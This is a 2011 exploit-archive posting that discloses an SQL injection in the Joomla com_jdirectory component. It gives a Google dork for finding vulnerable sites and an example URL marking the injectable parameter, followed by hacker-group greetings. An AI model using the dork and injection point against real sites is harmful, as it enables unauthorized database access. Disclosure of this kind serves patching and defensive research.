Joomla Component (com_jdirectory) SQL Injection Vulnerability

2011-08-03 10:15:06

=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure

Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com

#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================

####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####


[*] ExpLo!T :

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0

http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here


####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others |
============================================================================================ |

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.